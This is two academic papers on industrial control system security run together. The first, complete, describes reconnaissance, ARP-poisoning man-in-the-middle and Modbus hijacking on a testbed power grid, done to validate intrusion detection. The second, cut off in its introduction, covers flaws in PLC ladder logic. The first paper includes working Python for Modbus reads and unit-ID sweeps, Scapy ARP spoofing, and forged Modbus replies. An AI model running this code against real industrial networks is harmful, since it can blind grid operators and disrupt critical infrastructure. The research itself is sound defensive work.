Attacking_SCADA_systems_A_practical_perspective.pdf
As Supervisory Control and Data Acquisition (SCADA) and Industrial and Automation Control System (IACS) architectures became more open and interconnected, some of their remotely controlled processes also became more exposed to cyber threats. Aspects such as the use of mature technologies and legacy equipment, or even the unforeseen consequences of bridging IACS with external networks, have contributed to this situation. This situation prompted the involvement of governmental, industrial and research organizations, as well as standardization entities, in order to create and promote a series of recommendations and standards for IACS cyber-security. Despite those efforts, which are mostly focused on prevention and mitigation, existing literature still lacks attack descriptions that can be reused to reproduce and further research specific use cases and scenarios of security incidents, useful for improving and developing new security detection strategies. In this paper, we describe the implementation of a set of attacks targeting a SCADA hybrid testbed that reproduces an electrical grid for energy distribution (medium and high voltage). This environment makes use of real SCADA equipment to faithfully reproduce a real operational deployment, providing a better insight into less evident SCADA- and device-specificities.
Attacking SCADA systems: a practical perspective

Luís Rosa1, Tiago Cruz1, Paulo Simões1, Edmundo Monteiro1, Leonid Lev2
1CISUC-DEI, University of Coimbra, Portugal
2IEC Israel Electric Corporation, Israel
{lmrosa, tjcruz, psimoes, edmundo}@dei.uc.pt, [email protected]

Keywords: Industrial Control Systems, SCADA, Security

I. INTRODUCTION

Supervisory Control and Data Acquisition (SCADA) systems are used to manage and automate processes in critical infrastructures such as electricity grids or water distribution facilities. According to the ISA definition [1], SCADA-based Industrial and Automation Control Systems (IACS) are structured into five distinct levels: level 0, reserved for the sensors and actuators; level 1, which contains devices such as Programmable Logic Controllers (PLCs) and Remote Terminal Units (RTUs); level 2, composed of supervisory control equipment such as the Human-Machine Interface (HMI); level 3, for the Manufacturing Execution Systems (MES), such as the systems hosting production planning software; and level 4, for the remaining business-related systems.

The interconnection of level 0 and level 1 devices (e.g. PLCs and RTUs) and the interconnection of level 1 devices with level 2 devices (e.g. HMIs) are probably the most vulnerable points of IACS infrastructures. They were traditionally isolated and based on proprietary protocols and technologies without intrinsic security capabilities, relying on obscurity and air-gapping principles for such purposes. Nevertheless, with the progressive adoption of Ethernet- and TCP/IP-based networks, standardized SCADA protocols and VPN-based remote access (to reduce maintenance costs), these networks are more connected than ever to the remaining infrastructure (the corporate network and even the Internet), either by sharing physical network and computing resources or via (not foolproof) interconnection firewalls, routers or gateways. This paradigm change drastically increases the risks, due to the increased system complexity, the introduction of new attack vectors and the amplified exposure of existing security vulnerabilities.

SCADA systems are intrinsically different from traditional ICT systems [2]. Automated real-time physical processes do not need high throughput, but demand continuous availability with guaranteed low delay and low jitter. Moreover, their primary focus is on availability and service continuity, as opposed to classic ICT systems, where information confidentiality and integrity come first [3]. SCADA systems also have much longer lifetime cycles, due to their high upgrade costs, easily reaching obsolescence by ICT standards. Even simple security patches take much longer to deploy, due to the need for previous testing and certification.

Recognizing those specificities and risks, as well as the tremendous impact they can have on SCADA-based critical infrastructures such as energy grids, water distribution systems, transportation systems or factory plants, there is currently a strong investment on research towards enhancing the security of (both legacy and more recent) SCADA systems. There is extensive literature researching various approaches for introducing IACS-specific intrusion detection mechanisms, as well as for improving the intrinsic security of SCADA systems.
However, due to logistic constraints and the difficulty of using real-world production systems for research purposes, not many works are based on wider testbed scenarios reproducing real infrastructures, instead using very simplified test benches or general-purpose datasets. Among these, the large majority is focused on the defensive perspective of the targeted infrastructure, instead of the attacker's point of view. While this is understandable (considering how difficult it is to build larger, more realistic testbeds, and the fact that researchers aim to improve SCADA systems' cyber-security awareness and capabilities), we believe it is also important to grasp the attacker's perspective, including the challenges he faces to implement a successful attack.

In this paper, we provide a practical description of somewhat representative cyber-attacks (network-based enumeration, communication hijacking and service disruption) targeting SCADA systems within a testbed that represents an electricity grid (a regional network of medium and high voltage distribution). This testbed consists of a hybrid environment that includes real networking and SCADA assets (e.g. PLCs, HMIs, process control servers) controlling an emulated power grid (so we can assess the possible impact of these attacks on the physical world). We explain those attacks and discuss some of the challenges faced by an attacker to implement them.

This work was performed in the scope of the CockpitCI [4] and ATENA [5] research projects, which aim at providing a holistic approach to the security, safety and resilience of energy distribution grids, including the detection and prevention of cyber-attacks and the analysis of the mutual interdependency between their ICT assets (communications network, servers, SCADA control applications, PLCs and RTUs) and the energy side (e.g. transmission lines, substations, power transformers and generators, quality of energy service). Detection of cyber-attacks and situational awareness is a key part of these projects, and as such we built a specialized detection layer that has been extensively described and evaluated in previous works (e.g. [6-7]). This paper complements them by focusing not so much on the detection and mitigation solutions, but rather on the process of preparing and executing the attacks used for validation purposes. For the sake of readability and representativeness, we decided to focus on simple, classic attacks, instead of more complex actions.

The rest of the paper is organized as follows. In the next section, we discuss related work. Section III introduces the testbed environment we used. The implemented cyber-attacks are discussed in Section IV, and Section V concludes the paper.

II. RELATED WORK

As already mentioned, existing research literature discusses different types of cyber-attacks against SCADA systems, such as Denial of Service (DoS) attacks [8-10], Man-in-the-Middle (MitM) attacks [11-12] or malware-based attacks [13]. Nevertheless, those discussions are usually focused on the defense mechanisms (and not on the attacks), are based on small and/or simulated scenarios, or lack detail on the practical implementation of the attack. Post-incident research on real-world attacks is also a valuable source of information.
Ralph Langner's report on the well-known Stuxnet malware [14], which targeted Iranian nuclear facilities, is a good example of such sources. Other well-covered high-profile incidents include the Duqu malware [15] or the 2015 BlackEnergy attack, allegedly responsible for power outages in the Ukrainian power grid [16]. These sources have the advantage of being based on real, successful attacks, but are usually limited to the analysis of complex, high-profile incidents (often supported by nation-state resources) instead of simpler but representative attack profiles.

III. TARGET ENVIRONMENT

A. HEDVa Testbed

With the purpose of supporting the demonstration and validation of the CockpitCI framework, a testbed reproducing a regional-scale energy distribution network was built by Israel Electric Corporation (IEC). From the ICT and SCADA perspectives this testbed is composed of real assets, including the IT network, control and field level components, servers and services that typically integrate such a system. Within this scenario, an electrical distribution grid topology was entirely emulated using specialized software developed at IEC, given the practical impossibility of using a real, large-scale energy distribution infrastructure (composed of many substations and hundreds of kilometers of power lines). This approach results in a hybrid testbed, where all ICT and SCADA components are real and behave as if they were monitoring and controlling a real energy grid. This is achieved by using an agent-based grid simulation model that uses real PLC equipment to emulate elements such as feeders or circuit breakers. The interface between the real and emulated domains of the grid scenario includes all the monitoring data and controls that would exist in a real operational environment.

Figure 1 provides an overview of this testbed (designated as HEDVa: Hybrid Environment for Design and Validation), of which only a subset will be relevant to the scope of this paper. By using such an environment, it became possible to research more complex interdependencies between different components (e.g. network, SCADA devices) and different domains (e.g. the impact of ICT faults on the quality of energy at different points of the grid). Furthermore, having a real deployment of ICT and SCADA systems allowed more realistic assessments and the collection of more extensive and realistic validation data.

Figure 1: Overview of the HEDVa Testbed [6]

B. The Modbus Protocol

Among the wide range of different SCADA protocols available, the HEDVa testbed uses Modbus over TCP/IP [17-18]. Modbus is a protocol used to query field data using a polling client/server approach. Communication is based on query/response transactions identified by a transaction ID field and distinguished by a function code field. According to the Modbus data model, different types of tables are mapped into the PLC memory (such as discrete inputs, coils or holding registers). These values are queried via their respective function code and memory address (see Figure 2). There is no built-in mechanism (or fields) for authentication, authorization or encryption. Hence, without proper security enforcement in the remaining network stack, it becomes possible to dissect the Modbus message payload (i.e. critical information from a physical process).
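To make the message structure concrete, the following minimal Python sketch (not one of the tools used in this work) issues a Modbus/TCP "read holding registers" request directly over a TCP socket; the target address, unit ID and register range are placeholder assumptions.

```python
# Minimal sketch of a Modbus/TCP "read holding registers" request built
# directly over a TCP socket. Target IP, unit ID and register range are
# placeholders; real deployments differ.
import socket
import struct

def read_holding_registers(ip, unit_id=1, start=0, count=4, port=502, timeout=3):
    transaction_id = 0x0001
    pdu = struct.pack(">BHH", 0x03, start, count)        # function 0x03 + address + quantity
    # MBAP header: transaction ID, protocol ID (0), remaining length, unit ID
    mbap = struct.pack(">HHHB", transaction_id, 0x0000, len(pdu) + 1, unit_id)
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        sock.sendall(mbap + pdu)
        header = sock.recv(7)                            # MBAP header of the reply
        _, _, length, _ = struct.unpack(">HHHB", header)
        body = sock.recv(length - 1)                     # function code + data
    if body and body[0] == 0x03:
        byte_count = body[1]
        return struct.unpack(">" + "H" * (byte_count // 2), body[2:2 + byte_count])
    return None  # exception response or unexpected frame

# Example (hypothetical address):
# print(read_holding_registers("192.168.1.10", unit_id=1, start=0, count=4))
```

The MBAP header packed here (transaction ID, protocol ID, length, unit ID) corresponds to the frame layout discussed below (Figure 3).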
Figure 2: Example of the interaction between two Modbus devices

Forging communication or field data is also possible by simply crafting a valid value for the transaction ID field (see Figure 3), as this value is frequently predictable (due to the lack of randomness in poor Modbus implementations) or even blindly discarded by some Modbus implementations. Moreover, Modbus/TCP runs on top of non-encrypted TCP sessions.

Figure 3: Modbus Frame and header format

Even considering the real-time nature of the underlying processes, the polling-based mechanism provided by the Modbus protocol is not effectively real-time. The intervals between each request directly impact the delay between a change in the physical process and the time the change is observed by the HMI operator. This results in a small but viable time window for hijacking communications before the operator and/or the HMI application notice any changes.

Despite all these security vulnerabilities of Modbus apparently making the attacker's work too easy, Modbus holds a significant market share (over 20%, considering all its variations [19]) and many of the other protocols are not much different. This means the testbed is representative of a large subset of the systems currently in operation. Several open source components can be used to build Modbus hacking tools, such as Nmap's modbus-discover script [20] or Modscan [21], which allows mapping and enumerating PLCs using Modbus over TCP within a network by exploring their replies. Another example is a Python library extended from Scapy (a widely-used packet manipulation framework, easy to extend and integrate with other applications) that contains Modbus-specific functions to easily craft Modbus frames [22]. The next section discusses the execution of a series of attacks, which also served to validate the proposed distributed IDS (DIDS).

IV. ATTACK STAGING AND EXECUTION

All the attack scenarios assumed the attacker already had access to the process control network (e.g. as the result of a compromised host; this step, which corresponds to the initial exploitation, was intentionally omitted). For practical demonstrations, a dedicated host was deployed on the HEDVa to serve as a base for the attacker; since it was hosted on a virtual machine, it could be easily relocated within the infrastructure. A similar attack strategy could be implemented (with the proper adjustments) to trigger an attack (for instance, forging or sending Modbus packets) directly from a compromised HMI or other component.

A three-stage attack strategy was devised, pursuing the following goals: monitoring the process values (to gain knowledge about the nature and characteristics of the controlled process), changing them without being noticed in the SCADA HMI consoles and, finally, inducing service disruption on the energy grid. These stages cover a large subset of the steps of a cyber-attack targeting a SCADA system. A by no means exhaustive list of the implemented attacks includes classical and Modbus-specific scans, different variants of denial of service attacks based on network floods, and a SCADA-specific MitM attack customized for this process environment. Next, we describe some of those attacks.
A. The HEDVa use case scenario for attack implementation

For the sake of readability, we'll describe the attacks using a subset of the HEDVa testbed, configured to emulate an electricity distribution grid composed of two energy feeders and several circuit breakers, controlled by real Modbus PLCs (see Figure 4). Several HEDVa assets, including services, equipment (such as network switches and PLCs), servers (both physical and virtualized) and networks are also part of this use case. The PLCs and the remaining elements of the SCADA infrastructure in charge of the emulated grid are connected using an Ethernet LAN infrastructure (using VLAN segmentation for domain separation).

Figure 4: Representation of the electrical grid use case scenario

The scenario deployed on the HEDVa (see Figure 5) includes two Human-Machine Interface (HMI) hosts, controlling and supervising the PLCs, an OPC server, a dedicated database for past events and offline analysis, and a deployment of the CockpitCI DIDS (not depicted). However, the DIDS security detection components didn't play any active role: they were used to observe and document the attacks, without interfering with the attacker's actions. This scenario not only offered the means to validate the CockpitCI DIDS, but also the opportunity to implement and analyze a series of security strategies. For the latter purpose, and complementary to the classic penetration testing and auditing procedures, a series of team drills were executed to obtain relevant data on the most effective tactical defensive and offensive strategies.

Figure 5: Reference scenario for the use cases

Besides these efforts, the acquisition of relevant datasets for the development, training and offline evaluation of anomaly detection methods was also another important role of the HEDVa scenario. For capturing all the network interactions for further analysis, a centralized network point of capture was configured. This was achieved using port monitoring/mirroring at the switch layer, as opposed to a distributed packet acquisition solution, to avoid issues with duplicated packets or timestamp synchronization.

B. Network Reconnaissance

Network scouting is one of the first steps of an attack, meant to gather information about all the components of the target environment, to discover and identify topologies, hosts and services. For instance, traditional network components such as HMIs are identified by IP and MAC addresses, operating system versions and a set of services (using techniques such as FIN scans, see Figure 6); in such cases, the specific service footprint, together with TCP fingerprinting data, is useful to identify specific components or software implementations.

Figure 6: First step of a Network/Modbus scan

In addition to that, each PLC is also identified and addressed by the unitID field, part of the Modbus frame (see Figure 7).
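Because, as discussed next, a single IP address may answer for several unit IDs (e.g. behind a Modbus gateway), a practical reconnaissance pass also sweeps the unitID space. The following rough Python sketch illustrates such a sweep against a Modbus/TCP endpoint on the default port 502; the address and ID range are placeholder assumptions, and no specific vendor tool is implied.

```python
# Illustrative unit-ID sweep behind a single IP address (e.g. a Modbus gateway).
# A read request is sent for each candidate unit ID; any well-formed reply whose
# unit ID matches suggests a device is answering for that ID.
import socket
import struct

def sweep_unit_ids(ip, port=502, unit_ids=range(1, 248), timeout=1.0):
    found = []
    for uid in unit_ids:
        pdu = struct.pack(">BHH", 0x03, 0, 1)                        # read 1 holding register
        mbap = struct.pack(">HHHB", uid, 0x0000, len(pdu) + 1, uid)  # reuse uid as transaction ID
        try:
            with socket.create_connection((ip, port), timeout=timeout) as sock:
                sock.sendall(mbap + pdu)
                reply = sock.recv(260)
        except OSError:
            continue                                                 # no answer for this ID
        if len(reply) >= 8 and reply[6] == uid:                      # byte 6 of the MBAP is the unit ID
            found.append(uid)
    return found

# Example (hypothetical gateway address):
# print(sweep_unit_ids("192.168.1.20"))
```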
For simple scenarios where one IP address corresponds to one PLC, the unitID can be set to a fixed known value (typically 1) or may even be ignored by the Modbus implementation. Nevertheless, a Modbus gateway, using only one IP address, may hide several PLCs with different unitIDs. As part of an attack, a Modbus request with a wrong unitID, blindly used by an attacker, may be discarded or easily flagged by proper security mechanisms. Thus, for Modbus over TCP, it is critical to perform a Modbus enumeration on top of the traditional TCP/IP scans. Both types of scans are relevant, as they can be used not only to discover devices and types of services, but also to perform fingerprinting and to discover PLCs behind gateways.

Figure 7: Modbus Device Scan / Enumeration

Network scouting provides a perspective on the target infrastructure from the network point of view, corresponding to layers 2-4 of the OSI model. Despite its usefulness as a tool to identify and enumerate devices and services, it doesn't provide process-level information, which is required to implement sophisticated attacks. The next subsection presents the technique that was used to obtain such information.

C. Using ARP poisoning to implement a MitM attack

An ARP poisoning MitM attack usually comprises two parts: an ARP spoofing step and a communication hijacking step. In the first stage, the idea is to poison the ARP cache of both target devices, belonging to the same link, by sending malicious and unsolicited ARP is-at messages to the network (see Figure 8), forcing both devices to send their packets through the attacker's MAC address. This requires the attacker to know at least the IP and MAC addresses of the victims and the link they are connected to. As soon as the ARP cache of each victim is spoofed, the traffic gets redirected through the attacker.

Figure 8: ARP poisoning attack

In the second attack stage (see Figure 9), when the traffic is already being redirected, the attacker can choose to read the messages and forward them, or to actively change them. Depending on the type of TCP connection, its payload and the actual data the attacker is interested in, the process may get complex. For persistent TCP connections, as opposed to one TCP connection per data request (Modbus can be implemented using either communication model), the attacker will need to keep the TCP fields consistent (e.g. sequence and acknowledgement numbers) and the connection open (e.g. TCP keep-alive packets).

Figure 9: TCP hijacking

Moreover, in the case of Modbus, the requested values typically change in real-time and some of them are directly changed by the SCADA operator (e.g. Modbus writes). This means the attacker needs to keep track not only of all the interactions, but also to compute and reproduce the effects on the physical process (e.g. closing a circuit breaker in an electric path may change physical values such as current and voltage in other parts of the circuit). The complexity of this task increases as the number of elements, relations and interdependencies increases.
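As a concrete illustration of the ARP spoofing stage just described, the following sketch forges the unsolicited is-at replies with Scapy, the packet manipulation framework on which the authors' own tooling was built. It is a simplified, assumption-laden example: it poisons two hosts on the same link, whereas the attack described next spoofed a gateway interface instead of HMI1, and all addresses are placeholders.

```python
# Rough sketch of the ARP "is-at" poisoning stage using Scapy.
# IP/MAC values are placeholders; running this against a network you do not
# own or operate is illegal.
from scapy.all import ARP, Ether, sendp

HMI_IP, HMI_MAC = "10.0.0.10", "aa:bb:cc:dd:ee:01"   # hypothetical victim 1
PLC_IP, PLC_MAC = "10.0.0.20", "aa:bb:cc:dd:ee:02"   # hypothetical victim 2
ATTACKER_MAC    = "aa:bb:cc:dd:ee:99"

def poison_once():
    # Tell the HMI that the PLC's IP is at the attacker's MAC, and vice versa.
    # The attacker host must also forward the redirected traffic (e.g. kernel
    # IP forwarding) so the victims do not notice dropped connections.
    sendp(Ether(dst=HMI_MAC) / ARP(op=2, psrc=PLC_IP, pdst=HMI_IP,
                                   hwsrc=ATTACKER_MAC, hwdst=HMI_MAC), verbose=False)
    sendp(Ether(dst=PLC_MAC) / ARP(op=2, psrc=HMI_IP, pdst=PLC_IP,
                                   hwsrc=ATTACKER_MAC, hwdst=PLC_MAC), verbose=False)

def restore():
    # Unsolicited replies with the correct associations undo the poisoning,
    # mirroring the clean-up step described in Section IV-D.
    sendp(Ether(dst=HMI_MAC) / ARP(op=2, psrc=PLC_IP, pdst=HMI_IP,
                                   hwsrc=PLC_MAC, hwdst=HMI_MAC), verbose=False)
    sendp(Ether(dst=PLC_MAC) / ARP(op=2, psrc=HMI_IP, pdst=PLC_IP,
                                   hwsrc=HMI_MAC, hwdst=PLC_MAC), verbose=False)

# The poisoning must be refreshed periodically (e.g. every few seconds),
# otherwise the victims' ARP caches eventually recover.
```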
D. Attack strategy and execution

The objective of the attacker can be summarized as follows: hijack the entire grid in such a way that the main HMI (HMI1) has no clue about the ongoing attack, and accomplish this while going unnoticed. One of the first challenges faced by the attacker has to do with understanding the network topology and communication flows. For instance, the HMI1 host (one of the victims) is not part of the same network link as the PLCs, requiring the attacker to implement an ARP spoof targeting the gateway interface of the network link where the attacker is placed, instead of HMI1 itself (see Figure 10).

Figure 10: ARP poisoning for the implemented attack

Besides HMI1, there is a second HMI (HMI2), developed to observe and validate the attack, which was not spoofed. HMI1 uses persistent TCP connections to control several PLCs (11, to be more precise). Thus, the attacker needs to know how to handle or forward any spoofed packets in real-time, while avoiding TCP connection drops, to prevent any suspicious behaviour on the HMI console that could unveil his presence (see Figure 11). Packet drops automatically raise an alarm and change the view of the HMI for the corresponding PLC after a couple of seconds, indicating a potential issue. A lost TCP connection or a missing Modbus reply from a PLC is also visible from the HMI console. The second HMI did not use persistent connections. Later, during the trials, it was discovered that each PLC only supported a maximum of two simultaneous TCP connections, which may limit the way TCP connections are handled and redirected by the attacker.

Figure 11: TCP hijacking for the implemented attack

At first, the main concern was to place the attacker in the middle of the communication between HMI1 and the PLCs, to capture and analyze relevant process information. This allowed the attacker to gather more detailed information about the communications and the controlled process, learning how each Modbus register value affected the others (e.g. circuit breakers, current and voltage ranges). Once the attacker was able to figure out the basic behavior of the controlled process, it was time to step up the challenge and hijack the entire process. This required forging the entire grid state in such a way that any HMI interaction produces a realistic state update, while decoupling the HMI-PLC interactions. For this purpose, the attacker needs to reply to the Modbus requests in real-time. Moreover, TCP session hijacking requires the attacker to maintain the integrity of the TCP connection (such as TCP sequence numbers) to avoid a connection drop. The following task is then to craft the Modbus frames and recreate a fake view of the entire scenario in real-time.
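To give a flavour of that frame-forging step, the snippet below sketches how a syntactically valid reply to a captured "read holding registers" request can be built from the attacker's own replica of the process state. It is an illustrative reconstruction rather than the in-house tool described next; the state table and register layout are invented.

```python
# Hedged sketch of the frame-forging step: given a captured "read holding
# registers" request from the HMI, build a valid reply from the attacker's own
# replica of the process state instead of the real PLC values.
import struct

# Hypothetical replica of the grid state: (unit_id, register) -> value
fake_state = {(1, 0): 230, (1, 1): 12, (1, 2): 1}

def forge_read_response(request: bytes) -> bytes:
    trans_id, proto_id, _, unit_id = struct.unpack(">HHHB", request[:7])
    func, start, count = struct.unpack(">BHH", request[7:12])
    assert func == 0x03, "sketch only handles Read Holding Registers"
    values = [fake_state.get((unit_id, start + i), 0) for i in range(count)]
    payload = struct.pack(">BB", func, 2 * count) + b"".join(
        struct.pack(">H", v & 0xFFFF) for v in values)
    mbap = struct.pack(">HHHB", trans_id, proto_id, len(payload) + 1, unit_id)
    return mbap + payload

# The reply echoes the request's transaction and unit IDs, so at the Modbus
# layer the HMI cannot tell it apart from a genuine PLC answer.
```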
This task was implemented using an in-house application built on top of the Scapy framework [22], since the common open-source tools normally used for this sort of attack are not SCADA/Modbus aware and did not fulfill the project needs, either by not offering an integrated solution for all the steps or by lacking the flexibility to adjust settings to the HEDVa scenario.

After the ARP spoofing, the attacker first starts by capturing the current state of the grid. This is achieved by dumping and decoding one complete interaction cycle (i.e. the set of Modbus request-reply transactions) between HMI1 and all the PLCs. This represents the initial state of the simulated view, and it allows restoring the previous grid state after stopping the attack (in case the attacker wants to do so). The attacker is also responsible for performing deep inspection of each packet and selectively intercepting all the TCP connections from HMI1 to the PLCs, while forwarding the others (i.e. the remaining communications between HMIs and PLCs). When requests from HMI1 are received, the attacker computes the responses based on its own replica of the model (obtained during the process analysis stage). This effectively decouples HMI1 from the PLCs, creating two distinct communication flows: one between HMI1 and the attacker, and the other between the attacker and each PLC. This allows not only hijacking the data exchanged between them, but also triggering any kind of service disruption against the PLCs, compromising the physical process behind them. Since the true state of the PLCs is hidden from HMI1, the attacker is free to do whatever he wants without the knowledge of the legitimate SCADA operator. Moreover, all the changes performed by the SCADA operator, such as opening or closing a breaker, are properly intercepted and handled by the attacker. Finally, whenever the attacker decides to stop the attack, he only needs to perform the inverse of the first steps, dumping the values of the simulated HMI1 view to the PLCs so that there is no difference between the HMI1 and PLC states, and restoring the ARP caches by sending additional unsolicited ARP replies with the correct associations between MAC and IP addresses.

V. CONCLUSIONS AND FUTURE WORK

The attack procedures described here illustrate a complete intrusion procedure applied to a specific IACS use case. The reconnaissance step is similar to other types of network scans, the main difference being the Modbus unitID field, depending on the components and how they are deployed. Service disruption is also straightforward: as soon as the attacker has access to the network, it is simple to redirect Modbus traffic (causing the disruption) or even flood the PLCs, as they typically have a moderate to small amount of resources available. The communication hijacking attack that was implemented proved to be considerably more complex and more tightly coupled to the field processes in the SCADA environment than, for instance, an HTTP hijacking attempt. This is due to several reasons, such as the need to reproduce part of the physical process behavior without getting detected.
Beyond new infection paths, types of attacks or strategies to remain unnoticed, further efforts and research should focus on improving the process of recreating and maintaining the fake views used by the attacker during communication hijacking, namely for specific, well-known domains such as energy grids. This work is part of a wider effort where multiple cyber detection technologies are being researched to understand how these types of cyber-security events could be adequately handled. Moreover, this effort also intends to alleviate the lack of openly available datasets (such as raw traces from SCADA IACS), allowing further exploration and research of new security approaches and detection mechanisms.

ACKNOWLEDGMENT

This work was partially funded by the CockpitCI European Project (FP7-SEC-2011-1 Project 285647) and by the ATENA European Project (H2020-DS-2015-1 Project 700581).

REFERENCES

[1] ISA, "ISA-62443-1-1 Security for industrial automation and control systems. Part 1: Terminology, concepts, and models", draft 5, International Society for Automation, 2015.
[2] NIST, SP 800-82, "Guide to Industrial Control Systems (ICS) Security", Rev. 2, National Institute of Standards and Technology, 2015.
[3] ISA-99.00.01, "Security for Industrial Automation and Control Systems - Part 1: Terminology, Concepts, and Models", American National Standard, 2007.
[4] FP7 CockpitCI Research Project, https://www.cockpitci.eu/
[5] H2020 ATENA Research Project, https://www.atena-h2020.eu/
[6] T. Cruz, L. Rosa, J. Proença, L. Maglaras, M. Aubigny, L. Lev, J. Jiang, P. Simões, "A cybersecurity detection framework for supervisory control and data acquisition systems", IEEE Transactions on Industrial Informatics, preprint. doi:10.1109/TII.2016.2599841
[7] T. Cruz, J. Proença, P. Simões, M. Aubigny, M. Ouedraogo, A. Graziano, L. Maglaras, "A Distributed IDS for Industrial Control Systems", International Journal of Cyber Warfare and Terrorism, 4(2), 1-22, April-June 2014. doi:10.4018/ijcwt.2014040101
[8] C. Queiroz, A. Mahmood, J. Hu, Z. Tari, and X. Yu, "Building a SCADA security testbed", in Network and System Security (NSS '09), Third International Conference on, pp. 357-364, IEEE, 2009.
[9] M. Mallouhi, Y. Al-Nashif, D. Cox, T. Chadaga, and S. Hariri, "A testbed for analyzing security of SCADA control systems (TASSCS)", in Innovative Smart Grid Technologies, 2011 IEEE PES, pp. 1-7, 2011.
[10] S. Bhatia, N. Kush, C. Djamaludin, J. Akande, and E. Foo, "Practical Modbus flooding attack and detection", in Proceedings of the 12th Australasian Information Security Conference, Volume 149, pp. 57-65, Australian Computer Society, Inc., 2014.
[11] B. Chen, N. Pattanaik, A. Goulart, K. L. Butler-Purry, and D. Kundur, "Implementing attacks for Modbus/TCP protocol in a real-time cyber physical system test bed", in Communication Quality and Reliability (CQR), 2015 IEEE International Workshop Technical Committee on, pp. 1-6, 2015.
[12] E. E. Miciolino, G. Bernieri, F. Pascucci, and R. Setola, "Communications network analysis in a SCADA system testbed under cyber-attacks", in Telecommunications Forum (TELFOR), 2015 23rd, pp. 341-344, 2015.
[13] D. Chen, Y. Peng, and H. Wang, "Development of a testbed for process control system cybersecurity research", in 3rd International Conference on Electric and Electronics, Atlantis Press, 2013.
[14] R. Langner, "To kill a centrifuge: a technical analysis of what Stuxnet's creators tried to achieve", The Langner Group, November 2013.
[15] Laboratory of Cryptography and System Security (CrySyS), "Duqu: A Stuxnet-like malware found in the wild", http://www.crysys.hu/publications/files/bencsathPBF11duqu.pdf
[16] "BlackEnergy & Quedagh: the convergence of crimeware and APT attacks", https://www.fsecure.com/documents/996508/1030745/blackenergy_whitepaper.pdf
[17] Modbus Organization, "Modbus protocol specification".
[18] Modbus Organization, "Modbus messaging on TCP/IP implementation guide".
[19] IMS Research, "The World Market for Industrial Ethernet", 2013 Edition.
[20] Nmap Scripting Engine, modbus-discover NSE script, https://nmap.org/nsedoc/scripts/modbus-discover.html
[21] Mark Bristow, Modscan, https://code.google.com/archive/p/modscan/
[22] A. Gervais, "Modbus/TCP library for Scapy 0.1".
PLC_Code-Level_Vulnerabilities.pdf
Code vulnerabilities in the ladder logic of PLCs (Programmable Logic Controllers) have not been sufficiently addressed in the literature. Most of the research related to PLC threats or attacks focuses on the hardware portion of ICS (Industrial Control Systems) or SCADA (Supervisory Control and Data Acquisition) systems, such as industrial components, peripheral devices, or networks. It does not adequately discuss PLC code-level vulnerabilities and attacks. This paper provides an overview of some critical vulnerabilities within the PLC ladder logic code or program and recommends corresponding steps or methods to keep PLCs safer and more secure. The paper focuses on ladder logic code vulnerabilities and weak points that might be exploited by malicious attacks. Those weak points could be the result of intentional malicious pieces of code embedded within the ladder logic code, or inadvertent ones such as bad code practices or human errors.
PLC Code-Level Vulnerabilities

Abraham Serhane1,2, Mohamad Raad1
1International University of Beirut, 146404 Mazraa, Beirut, Lebanon. Email: [email protected]
Raad Raad2, Willy Susilo2
2University of Wollongong, Northfields Ave, Wollongong NSW 2522, Australia

Index Terms: DoS: Denial of Service; HMI: Human Machine Interface; ICS: Industrial Control Systems; JSR: Jump to Subroutine instruction; PLC: Programmable Logic Controller; OTE: Output Energize instruction; SBR: Subroutine instruction; SCADA: Supervisory Control and Data Acquisition.

I. INTRODUCTION

PLCs are widely used in automated industrial facilities and factories, including national critical infrastructure: power grids, water treatment, nuclear reactors, assembly lines, etc. PLCs are dedicated and reliable real-time devices. Despite their reliability, accuracy, flexibility, and industrial robustness, PLCs have become a big concern after the Stuxnet malicious attack in June 2010. The Stuxnet malware highlighted the vulnerability of PLCs. The malware targeted PLCs and was able to stealthily and maliciously spy on, attack, and compromise PLC-related devices and code [1], [2], [3], causing serious damage. Since Stuxnet's attack, PLCs have attracted the attention of hackers with different malware attacks such as BlackEnergy, Flame, and Wiper [4], [5], [6]. In 2011, the number of SCADA attacks increased by 300%, and the average number of ICS flaws increased by 5% every year after that [7]; see Fig. 1. A study conducted by Kaspersky Lab shows that most of these PLC-related attacks are either critical, 49%, or of medium risk, 42%; see Fig. 2. The report clearly indicates that only 85% of these known, published vulnerabilities are fixed; the rest are either partially fixed, cannot be fixed, or not fixed at all [8]. According to Symantec, there were about 135 public vulnerabilities reported in 2015 that are related to ICS/PLC-BS, while in 2014 only 35 ICS-related vulnerabilities were reported [9].

Much attention is usually directed towards external attacks like network intrusion, compromised SCADA devices and DoS (Denial of Service) attacks, but little attention is given to ladder logic code vulnerabilities [10]. It has been assumed that ladder logic code is secure and safe as long as the network is healthy and protected from malware or intruders. But that is not sufficient, since the ladder logic itself has its own overlooked or unnoticed vulnerabilities, which will be discussed in detail in this paper. Indeed, not many solutions exist to help secure PLCs, such as certificateless cryptography [11] or intrusion detection through expected response times under normal operating conditions such as [12] and [13].

II. PLC OVERVIEW

PLCs are a family of embedded devices. Besides its hardware architecture, a PLC has its own OS. The software side is our concern here, because it is usually the part most vulnerable to cyber-attacks. PLC software consists of the following:

1) PLC OS: PLCs provide the main control of ICS/SCADA systems. They are real-time systems, responsible for real-time interaction with all inputs (status or feedback of sensors, HMIs, other PLCs, field devices, etc.) via industrial networks, and for transmitting the proper outputs or commands after executing certain programs (ladder logic code) within the PLC in a very limited time. Unlike regular microcontrollers, PLCs contain firmware (an OS), which makes them vulnerable to attacks and threats. PLCs generally contain a real-time operating system such as OS-9 or VxWorks [14]. If the OS is compromised by a hacker, the whole system can be completely taken over, opening the door to varieties of malicious attacks and threats.

2) Ladder Logic Code: Ladder logic is the programming language in which the code (logic) of PLC programs is written, using special compilers or software. RSLogix5000, for instance, is software used to write, edit, and compile ladder logic code. The software uses IEC 61131-3 languages for the
